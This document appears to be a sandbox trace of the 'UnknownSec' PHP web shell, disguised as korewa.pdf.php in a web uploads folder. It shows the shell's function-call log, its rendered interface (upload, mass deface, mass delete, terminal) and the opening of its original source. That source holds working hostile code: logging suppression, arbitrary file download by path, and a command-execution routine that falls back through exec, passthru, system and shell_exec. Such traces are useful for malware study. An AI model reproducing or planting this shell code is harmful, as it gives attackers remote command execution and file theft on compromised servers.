1 A /var/www/html/uploads/korewa.pdf.php 166 $i++
2 15 0 0.001451 533992 p 1 /var/www/html/uploads/korewa.pdf.php 172 1 '/var/www/html/uploads'
3 16 0 0.001464 533992 fileperms 0 /var/www/html/uploads/korewa.pdf.php 99 1 '/var/www/html/uploads'
3 16 1 0.001481 534056
3 16 R 16895
2 A /var/www/html/uploads/korewa.pdf.php 99 $p = 16895
2 A /var/www/html/uploads/korewa.pdf.php 109 $i = 'd'
2 A /var/www/html/uploads/korewa.pdf.php 117 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 118 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 121 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 122 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 123 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 126 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 127 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 128 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 131 $i .= 'x'
2 15 1 0.001612 534056
2 15 R 'drwxrwxrwx'
2 17 0 0.001626 534056 ▟ 1 /var/www/html/uploads/korewa.pdf.php 172 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 18 0 0.001640 534056 getcwd 0 /var/www/html/uploads/korewa.pdf.php 31 0
3 18 1 0.001653 534104
3 18 R '/var/www/html/uploads'
2 A /var/www/html/uploads/korewa.pdf.php 31 $▚ = '/var/www/html/uploads'
3 19 0 0.001678 534104 is_writable 0 /var/www/html/uploads/korewa.pdf.php 33 1 '/var/www/html/uploads'
3 19 1 0.001697 534144
3 19 R TRUE
2 17 1 0.001711 534120
2 17 R '<font color=\'green\'>drwxrwxrwx</font>'
2 20 0 0.001729 534016 getcwd 0 /var/www/html/uploads/korewa.pdf.php 192 0
2 20 1 0.001742 534064
2 20 R '/var/www/html/uploads'
1 A /var/www/html/uploads/korewa.pdf.php 192 $dir = '/var/www/html/uploads'
2 21 0 0.001767 534064 str_replace 0 /var/www/html/uploads/korewa.pdf.php 194 3 '\\' '/' '/var/www/html/uploads'
2 21 1 0.001782 534160
2 21 R '/var/www/html/uploads'
1 A /var/www/html/uploads/korewa.pdf.php 194 $dir = '/var/www/html/uploads'
2 22 0 0.001805 534064 explode 0 /var/www/html/uploads/korewa.pdf.php 195 2 '/' '/var/www/html/uploads'
2 22 1 0.001820 534640
2 22 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/korewa.pdf.php 195 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/korewa.pdf.php 196 $i = 0
1 A /var/www/html/uploads/korewa.pdf.php 196 $i++
2 23 0 0.001880 534568 scandir 0 /var/www/html/uploads/korewa.pdf.php 607 1 '/var/www/html/uploads'
2 23 1 0.001911 535192
2 23 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'korewa.pdf.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/korewa.pdf.php 607 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'korewa.pdf.php', 5 => 'prepend.php']
2 24 0 0.001948 535160 getcwd 0 /var/www/html/uploads/korewa.pdf.php 608 0
2 24 1 0.001961 535208
2 24 R '/var/www/html/uploads'
1 A /var/www/html/uploads/korewa.pdf.php 608 $pa = '/var/www/html/uploads'
2 25 0 0.001987 535208 filemtime 0 /var/www/html/uploads/korewa.pdf.php 620 1 '/var/www/html/uploads/.'
2 25 1 0.002002 535248
2 25 R 1676261907
2 26 0 0.002016 535160 date 0 /var/www/html/uploads/korewa.pdf.php 620 2 'Y-m-d g:i:s' 1676261907
2 26 1 0.002072 537552
2 26 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 620 $dtime = '2023-02-12 11:18:27'
2 27 0 0.002101 537528 is_dir 0 /var/www/html/uploads/korewa.pdf.php 621 1 '/var/www/html/uploads/.'
2 27 1 0.002115 537568
2 27 R TRUE
2 28 0 0.002128 537536 filemtime 0 /var/www/html/uploads/korewa.pdf.php 620 1 '/var/www/html/uploads/..'
2 28 1 0.002144 537584
2 28 R 1676261906
2 29 0 0.002158 537488 date 0 /var/www/html/uploads/korewa.pdf.php 620 2 'Y-m-d g:i:s' 1676261906
2 29 1 0.002189 537816
2 29 R '2023-02-12 11:18:26'
1 A /var/www/html/uploads/korewa.pdf.php 620 $dtime = '2023-02-12 11:18:26'
2 30 0 0.002214 537544 is_dir 0 /var/www/html/uploads/korewa.pdf.php 621 1 '/var/www/html/uploads/..'
2 30 1 0.002227 537584
2 30 R TRUE
2 31 0 0.002241 537544 filemtime 0 /var/www/html/uploads/korewa.pdf.php 620 1 '/var/www/html/uploads/.htaccess'
2 31 1 0.002256 537584
2 31 R 1676261906
2 32 0 0.002269 537488 date 0 /var/www/html/uploads/korewa.pdf.php 620 2 'Y-m-d g:i:s' 1676261906
2 32 1 0.002299 537816
2 32 R '2023-02-12 11:18:26'
1 A /var/www/html/uploads/korewa.pdf.php 620 $dtime = '2023-02-12 11:18:26'
2 33 0 0.002324 537544 is_dir 0 /var/www/html/uploads/korewa.pdf.php 621 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.002337 537584
2 33 R FALSE
2 34 0 0.002351 537544 filemtime 0 /var/www/html/uploads/korewa.pdf.php 620 1 '/var/www/html/uploads/data'
2 34 1 0.002365 537584
2 34 R 1676261907
2 35 0 0.002378 537488 date 0 /var/www/html/uploads/korewa.pdf.php 620 2 'Y-m-d g:i:s' 1676261907
2 35 1 0.002414 537816
2 35 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 620 $dtime = '2023-02-12 11:18:27'
2 36 0 0.002439 537544 is_dir 0 /var/www/html/uploads/korewa.pdf.php 621 1 '/var/www/html/uploads/data'
2 36 1 0.002452 537584
2 36 R TRUE
2 37 0 0.002466 537544 is_writable 0 /var/www/html/uploads/korewa.pdf.php 628 1 '/var/www/html/uploads/data'
2 37 1 0.002482 537584
2 37 R TRUE
2 38 0 0.002496 537544 p 1 /var/www/html/uploads/korewa.pdf.php 630 1 '/var/www/html/uploads/data'
3 39 0 0.002509 537544 fileperms 0 /var/www/html/uploads/korewa.pdf.php 99 1 '/var/www/html/uploads/data'
3 39 1 0.002522 537584
3 39 R 16895
2 A /var/www/html/uploads/korewa.pdf.php 99 $p = 16895
2 A /var/www/html/uploads/korewa.pdf.php 109 $i = 'd'
2 A /var/www/html/uploads/korewa.pdf.php 117 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 118 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 121 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 122 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 123 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 126 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 127 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 128 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 131 $i .= 'x'
2 38 1 0.002641 537584
2 38 R 'drwxrwxrwx'
2 40 0 0.002656 537544 is_writable 0 /var/www/html/uploads/korewa.pdf.php 631 1 '/var/www/html/uploads/data'
2 40 1 0.002672 537584
2 40 R TRUE
2 41 0 0.002686 537552 filemtime 0 /var/www/html/uploads/korewa.pdf.php 620 1 '/var/www/html/uploads/korewa.pdf.php'
2 41 1 0.002701 537600
2 41 R 1676261907
2 42 0 0.002714 537496 date 0 /var/www/html/uploads/korewa.pdf.php 620 2 'Y-m-d g:i:s' 1676261907
2 42 1 0.002745 537824
2 42 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 620 $dtime = '2023-02-12 11:18:27'
2 43 0 0.002770 537560 is_dir 0 /var/www/html/uploads/korewa.pdf.php 621 1 '/var/www/html/uploads/korewa.pdf.php'
2 43 1 0.002783 537600
2 43 R FALSE
2 44 0 0.002796 537560 filemtime 0 /var/www/html/uploads/korewa.pdf.php 620 1 '/var/www/html/uploads/prepend.php'
2 44 1 0.002811 537600
2 44 R 1676261907
2 45 0 0.002824 537496 date 0 /var/www/html/uploads/korewa.pdf.php 620 2 'Y-m-d g:i:s' 1676261907
2 45 1 0.002855 537824
2 45 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 620 $dtime = '2023-02-12 11:18:27'
2 46 0 0.002879 537560 is_dir 0 /var/www/html/uploads/korewa.pdf.php 621 1 '/var/www/html/uploads/prepend.php'
2 46 1 0.002892 537600
2 46 R FALSE
2 47 0 0.002906 537544 filemtime 0 /var/www/html/uploads/korewa.pdf.php 654 1 '/var/www/html/uploads/.'
2 47 1 0.002930 537568
2 47 R 1676261907
2 48 0 0.002944 537480 date 0 /var/www/html/uploads/korewa.pdf.php 654 2 'Y-m-d g:i:s' 1676261907
2 48 1 0.002975 537808
2 48 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 654 $ftime = '2023-02-12 11:18:27'
2 49 0 0.003001 537784 is_file 0 /var/www/html/uploads/korewa.pdf.php 655 1 '/var/www/html/uploads/.'
2 49 1 0.003015 537824
2 49 R FALSE
2 50 0 0.003028 537792 filemtime 0 /var/www/html/uploads/korewa.pdf.php 654 1 '/var/www/html/uploads/..'
2 50 1 0.003043 537840
2 50 R 1676261906
2 51 0 0.003056 537744 date 0 /var/www/html/uploads/korewa.pdf.php 654 2 'Y-m-d g:i:s' 1676261906
2 51 1 0.003087 538072
2 51 R '2023-02-12 11:18:26'
1 A /var/www/html/uploads/korewa.pdf.php 654 $ftime = '2023-02-12 11:18:26'
2 52 0 0.003112 537800 is_file 0 /var/www/html/uploads/korewa.pdf.php 655 1 '/var/www/html/uploads/..'
2 52 1 0.003124 537840
2 52 R FALSE
2 53 0 0.003137 537800 filemtime 0 /var/www/html/uploads/korewa.pdf.php 654 1 '/var/www/html/uploads/.htaccess'
2 53 1 0.003152 537840
2 53 R 1676261906
2 54 0 0.003166 537744 date 0 /var/www/html/uploads/korewa.pdf.php 654 2 'Y-m-d g:i:s' 1676261906
2 54 1 0.003196 538072
2 54 R '2023-02-12 11:18:26'
1 A /var/www/html/uploads/korewa.pdf.php 654 $ftime = '2023-02-12 11:18:26'
2 55 0 0.003225 537800 is_file 0 /var/www/html/uploads/korewa.pdf.php 655 1 '/var/www/html/uploads/.htaccess'
2 55 1 0.003239 537840
2 55 R TRUE
2 56 0 0.003252 537800 filesize 0 /var/www/html/uploads/korewa.pdf.php 656 1 '/var/www/html/uploads/.htaccess'
2 56 1 0.003265 537840
2 56 R 64
1 A /var/www/html/uploads/korewa.pdf.php 656 $size = 0.0625
2 57 0 0.003289 537744 round 0 /var/www/html/uploads/korewa.pdf.php 657 2 0.0625 3
2 57 1 0.003303 537816
2 57 R 0.063
1 A /var/www/html/uploads/korewa.pdf.php 657 $size = 0.063
1 A /var/www/html/uploads/korewa.pdf.php 661 $size = '0.063 KB'
2 58 0 0.003338 537784 pathinfo 0 /var/www/html/uploads/korewa.pdf.php 666 2 '.htaccess' 4
2 58 1 0.003354 537888
2 58 R 'htaccess'
2 59 0 0.003368 537824 strtolower 0 /var/www/html/uploads/korewa.pdf.php 666 1 'htaccess'
2 59 1 0.003380 537856
2 59 R 'htaccess'
1 A /var/www/html/uploads/korewa.pdf.php 666 $▖ = 'htaccess'
2 60 0 0.003405 537880 is_writable 0 /var/www/html/uploads/korewa.pdf.php 725 1 '/var/www/html/uploads/.htaccess'
2 60 1 0.003422 537920
2 60 R FALSE
2 61 0 0.003436 537880 is_readable 0 /var/www/html/uploads/korewa.pdf.php 726 1 '/var/www/html/uploads/.htaccess'
2 61 1 0.003451 537920
2 61 R TRUE
2 62 0 0.003464 537880 p 1 /var/www/html/uploads/korewa.pdf.php 727 1 '/var/www/html/uploads/.htaccess'
3 63 0 0.003477 537880 fileperms 0 /var/www/html/uploads/korewa.pdf.php 99 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.003490 537920
3 63 R 33188
2 A /var/www/html/uploads/korewa.pdf.php 99 $p = 33188
2 A /var/www/html/uploads/korewa.pdf.php 105 $i = '-'
2 A /var/www/html/uploads/korewa.pdf.php 117 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 118 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 121 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 122 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 123 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 126 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 127 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 128 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 131 $i .= '-'
2 62 1 0.003628 537920
2 62 R '-rw-r--r--'
2 64 0 0.003642 537880 is_writable 0 /var/www/html/uploads/korewa.pdf.php 728 1 '/var/www/html/uploads/.htaccess'
2 64 1 0.003659 537920
2 64 R FALSE
2 65 0 0.003672 537880 is_readable 0 /var/www/html/uploads/korewa.pdf.php 728 1 '/var/www/html/uploads/.htaccess'
2 65 1 0.003687 537920
2 65 R TRUE
2 66 0 0.003707 537992 filemtime 0 /var/www/html/uploads/korewa.pdf.php 654 1 '/var/www/html/uploads/data'
2 66 1 0.003723 538032
2 66 R 1676261907
2 67 0 0.003736 537936 date 0 /var/www/html/uploads/korewa.pdf.php 654 2 'Y-m-d g:i:s' 1676261907
2 67 1 0.003766 538264
2 67 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 654 $ftime = '2023-02-12 11:18:27'
2 68 0 0.003792 537992 is_file 0 /var/www/html/uploads/korewa.pdf.php 655 1 '/var/www/html/uploads/data'
2 68 1 0.003805 538032
2 68 R FALSE
2 69 0 0.003819 538000 filemtime 0 /var/www/html/uploads/korewa.pdf.php 654 1 '/var/www/html/uploads/korewa.pdf.php'
2 69 1 0.003833 538048
2 69 R 1676261907
2 70 0 0.003846 537944 date 0 /var/www/html/uploads/korewa.pdf.php 654 2 'Y-m-d g:i:s' 1676261907
2 70 1 0.003877 538272
2 70 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 654 $ftime = '2023-02-12 11:18:27'
2 71 0 0.003902 538008 is_file 0 /var/www/html/uploads/korewa.pdf.php 655 1 '/var/www/html/uploads/korewa.pdf.php'
2 71 1 0.003915 538048
2 71 R TRUE
2 72 0 0.003927 538008 filesize 0 /var/www/html/uploads/korewa.pdf.php 656 1 '/var/www/html/uploads/korewa.pdf.php'
2 72 1 0.003940 538048
2 72 R 23790
1 A /var/www/html/uploads/korewa.pdf.php 656 $size = 23.232421875
2 73 0 0.003964 537904 round 0 /var/www/html/uploads/korewa.pdf.php 657 2 23.232421875 3
2 73 1 0.003977 537976
2 73 R 23.232
1 A /var/www/html/uploads/korewa.pdf.php 657 $size = 23.232
1 A /var/www/html/uploads/korewa.pdf.php 661 $size = '23.232 KB'
2 74 0 0.004018 537944 pathinfo 0 /var/www/html/uploads/korewa.pdf.php 666 2 'korewa.pdf.php' 4
2 74 1 0.004033 538040
2 74 R 'php'
2 75 0 0.004046 537976 strtolower 0 /var/www/html/uploads/korewa.pdf.php 666 1 'php'
2 75 1 0.004059 538008
2 75 R 'php'
1 A /var/www/html/uploads/korewa.pdf.php 666 $▖ = 'php'
2 76 0 0.004084 538000 is_writable 0 /var/www/html/uploads/korewa.pdf.php 725 1 '/var/www/html/uploads/korewa.pdf.php'
2 76 1 0.004099 538040
2 76 R FALSE
2 77 0 0.004113 538000 is_readable 0 /var/www/html/uploads/korewa.pdf.php 726 1 '/var/www/html/uploads/korewa.pdf.php'
2 77 1 0.004128 538040
2 77 R TRUE
2 78 0 0.004141 538000 p 1 /var/www/html/uploads/korewa.pdf.php 727 1 '/var/www/html/uploads/korewa.pdf.php'
3 79 0 0.004154 538000 fileperms 0 /var/www/html/uploads/korewa.pdf.php 99 1 '/var/www/html/uploads/korewa.pdf.php'
3 79 1 0.004166 538040
3 79 R 33204
2 A /var/www/html/uploads/korewa.pdf.php 99 $p = 33204
2 A /var/www/html/uploads/korewa.pdf.php 105 $i = '-'
2 A /var/www/html/uploads/korewa.pdf.php 117 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 118 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 121 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 122 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 123 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 126 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 127 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 128 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 131 $i .= '-'
2 78 1 0.004285 538040
2 78 R '-rw-rw-r--'
2 80 0 0.004299 538000 is_writable 0 /var/www/html/uploads/korewa.pdf.php 728 1 '/var/www/html/uploads/korewa.pdf.php'
2 80 1 0.004315 538040
2 80 R FALSE
2 81 0 0.004328 538000 is_readable 0 /var/www/html/uploads/korewa.pdf.php 728 1 '/var/www/html/uploads/korewa.pdf.php'
2 81 1 0.004343 538040
2 81 R TRUE
2 82 0 0.004356 538000 filemtime 0 /var/www/html/uploads/korewa.pdf.php 654 1 '/var/www/html/uploads/prepend.php'
2 82 1 0.004371 538040
2 82 R 1676261907
2 83 0 0.004384 537936 date 0 /var/www/html/uploads/korewa.pdf.php 654 2 'Y-m-d g:i:s' 1676261907
2 83 1 0.004415 538264
2 83 R '2023-02-12 11:18:27'
1 A /var/www/html/uploads/korewa.pdf.php 654 $ftime = '2023-02-12 11:18:27'
2 84 0 0.004441 538000 is_file 0 /var/www/html/uploads/korewa.pdf.php 655 1 '/var/www/html/uploads/prepend.php'
2 84 1 0.004454 538040
2 84 R TRUE
2 85 0 0.004467 538000 filesize 0 /var/www/html/uploads/korewa.pdf.php 656 1 '/var/www/html/uploads/prepend.php'
2 85 1 0.004480 538040
2 85 R 57
1 A /var/www/html/uploads/korewa.pdf.php 656 $size = 0.0556640625
2 86 0 0.004503 537896 round 0 /var/www/html/uploads/korewa.pdf.php 657 2 0.0556640625 3
2 86 1 0.004516 537968
2 86 R 0.056
1 A /var/www/html/uploads/korewa.pdf.php 657 $size = 0.056
1 A /var/www/html/uploads/korewa.pdf.php 661 $size = '0.056 KB'
2 87 0 0.004551 537936 pathinfo 0 /var/www/html/uploads/korewa.pdf.php 666 2 'prepend.php' 4
2 87 1 0.004565 538032
2 87 R 'php'
2 88 0 0.004578 537968 strtolower 0 /var/www/html/uploads/korewa.pdf.php 666 1 'php'
2 88 1 0.004591 538000
2 88 R 'php'
1 A /var/www/html/uploads/korewa.pdf.php 666 $▖ = 'php'
2 89 0 0.004615 538000 is_writable 0 /var/www/html/uploads/korewa.pdf.php 725 1 '/var/www/html/uploads/prepend.php'
2 89 1 0.004631 538040
2 89 R FALSE
2 90 0 0.004645 538000 is_readable 0 /var/www/html/uploads/korewa.pdf.php 726 1 '/var/www/html/uploads/prepend.php'
2 90 1 0.004660 538040
2 90 R TRUE
2 91 0 0.004673 538000 p 1 /var/www/html/uploads/korewa.pdf.php 727 1 '/var/www/html/uploads/prepend.php'
3 92 0 0.004686 538000 fileperms 0 /var/www/html/uploads/korewa.pdf.php 99 1 '/var/www/html/uploads/prepend.php'
3 92 1 0.004699 538040
3 92 R 33261
2 A /var/www/html/uploads/korewa.pdf.php 99 $p = 33261
2 A /var/www/html/uploads/korewa.pdf.php 105 $i = '-'
2 A /var/www/html/uploads/korewa.pdf.php 117 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 118 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 121 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 122 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 123 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 126 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 127 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 128 $i .= '-'
2 A /var/www/html/uploads/korewa.pdf.php 131 $i .= 'x'
2 91 1 0.004823 538040
2 91 R '-rwxr-xr-x'
2 93 0 0.004838 538000 is_writable 0 /var/www/html/uploads/korewa.pdf.php 728 1 '/var/www/html/uploads/prepend.php'
2 93 1 0.004854 538040
2 93 R FALSE
2 94 0 0.004867 538000 is_readable 0 /var/www/html/uploads/korewa.pdf.php 728 1 '/var/www/html/uploads/prepend.php'
2 94 1 0.004882 538040
2 94 R TRUE
2 95 0 0.004896 537936 date 0 /var/www/html/uploads/korewa.pdf.php 757 1 'Y'
2 95 1 0.004925 538224
2 95 R '2023'
2 96 0 0.004939 538128 p 1 /var/www/html/uploads/korewa.pdf.php 758 1 '/var/www/html/uploads'
3 97 0 0.004951 538128 fileperms 0 /var/www/html/uploads/korewa.pdf.php 99 1 '/var/www/html/uploads'
3 97 1 0.004966 538152
3 97 R 16895
2 A /var/www/html/uploads/korewa.pdf.php 99 $p = 16895
2 A /var/www/html/uploads/korewa.pdf.php 109 $i = 'd'
2 A /var/www/html/uploads/korewa.pdf.php 117 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 118 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 121 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 122 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 123 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 126 $i .= 'x'
2 A /var/www/html/uploads/korewa.pdf.php 127 $i .= 'r'
2 A /var/www/html/uploads/korewa.pdf.php 128 $i .= 'w'
2 A /var/www/html/uploads/korewa.pdf.php 131 $i .= 'x'
2 96 1 0.005084 538152
2 96 R 'drwxrwxrwx'
2 98 0 0.005098 538152 ▟_2 1 /var/www/html/uploads/korewa.pdf.php 758 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 99 0 0.005111 538152 getcwd 0 /var/www/html/uploads/korewa.pdf.php 43 0
3 99 1 0.005125 538200
3 99 R '/var/www/html/uploads'
2 A /var/www/html/uploads/korewa.pdf.php 43 $▚ = '/var/www/html/uploads'
3 100 0 0.005150 538200 is_writable 0 /var/www/html/uploads/korewa.pdf.php 45 1 '/var/www/html/uploads'
3 100 1 0.005165 538240
3 100 R TRUE
2 98 1 0.005178 538152
2 98 R NULL
1 3 1 0.005193 537920
0.005228 363520
TRACE END [2023-02-13 02:18:52.917469]
Generated HTML code
<html><head>
<meta name="author" content="UnknownSec">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>localhost - UnknownSec 403</title>
<meta name="viewport" content="width=device-width, initial-scale=0.60, user-scalable=no">
<link rel="stylesheet" href="//unknownsec1337.github.io/main/style.css" type="text/css">
</head>
<body>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js"></script>
<div class="card text-dark">
<div class="card-header">
<a href="?"><h4>UnknownSec Bypass <i class="fas fa-biohazard"></i> 403</h4></a><i class="fab fa-gitter"></i> : <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]
<div class="dropdown">
<button class="btn btn-dark dropdown-toggle" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="fas fa-server"></i> Menu</button>
<div class="dropdown-menu">
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=upload"><i class="fas fa-upload"></i> Upload</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=depes"><i class="fas fa-theater-masks"></i> Mass depes</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=delete"><i class="far fa-trash-alt"></i> Mass delete</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=cmd"><i class="fas fa-terminal"></i> Terminal</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=info"><i class="fas fa-info-circle"></i> Info server</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=about"><i class="fas fa-info"></i> About</a>
</div>
</div>
</div>
</div><br><center></center><div class="container-fluid"><table class="table table-striped table-bordered table-hover bg-white" cellspacing="0" cellpadding="7" width="100%">
<tbody><tr>
<th class="text-center bg-dark text-white">Name</th>
<th class="text-center bg-dark text-white">Last edit</th>
<th class="text-center bg-dark text-white">Size</th>
<th class="text-center bg-dark text-white">Permission</th>
<th class="text-center bg-dark text-white">Options</th>
</tr>
<tr>
</tr><tr>
<td><img src="//unknownsec1337.github.io/icon/dflt.png" class="ico"><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>2023-02-12 11:18:20</center></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-control" style="width: 40%;" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go">
</div>
</div></form>
</td>
</tr>
<tr>
<td><img src="//unknownsec1337.github.io/icon/php.png" class="ico"><a href="?filesrc=/var/www/html/korewa.pdf.php&path=/var/www/html">korewa.pdf.php</a></td>
<td><center>2023-02-12 11:18:20</center></td>
<td><center>23.232 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-control" style="width: 40%;" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="korewa.pdf.php">
<input type="hidden" name="path" value="/var/www/html/korewa.pdf.php">
<div class="input-group-append">
<input class="btn btn-primary btn-block" type="submit" value="Go">
</div>
</div></form>
</td>
</tr>
</tbody></table>
<div class="card text-dark">
<div class="card-header text-center">
<kbd>Copyright © 2023 - <a href="">UnknownSec</a></kbd>
<br>
</div>
</div>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</div></body></html>Original PHP code
<?php
/* ~ Gw doain kalo lu recode tytyd lu jadi kecil
~ v.02
~ special thanks to Michy Amrane
~ untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ▟_2($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
} else {
return "[ <font color='red'>This directory is unreadable</font> ]";
}
}
function dc($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ip() {
$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function x($cmd) {
$▙ = '';
if(function_exists('exec')) {
@exec($cmd,$▙);
$▙ = @join("\n",$▙);
}elseif (function_exists('passthru')) {
ob_start();
@passthru($cmd);
$▙ = ob_get_clean();
}elseif (function_exists('system')) {
ob_start();
@system($cmd);
$▙ = ob_get_clean();
}elseif (function_exists('shell_exec')) {
$▙ = shell_exec($cmd);
}else return "↳ Unable to execute command\n";
return ($▙==''?"↳ Query did not return anything\n":$▙);
}
function p($file){
$p = fileperms($file);
if (($p & 0xC000) == 0xC000) {
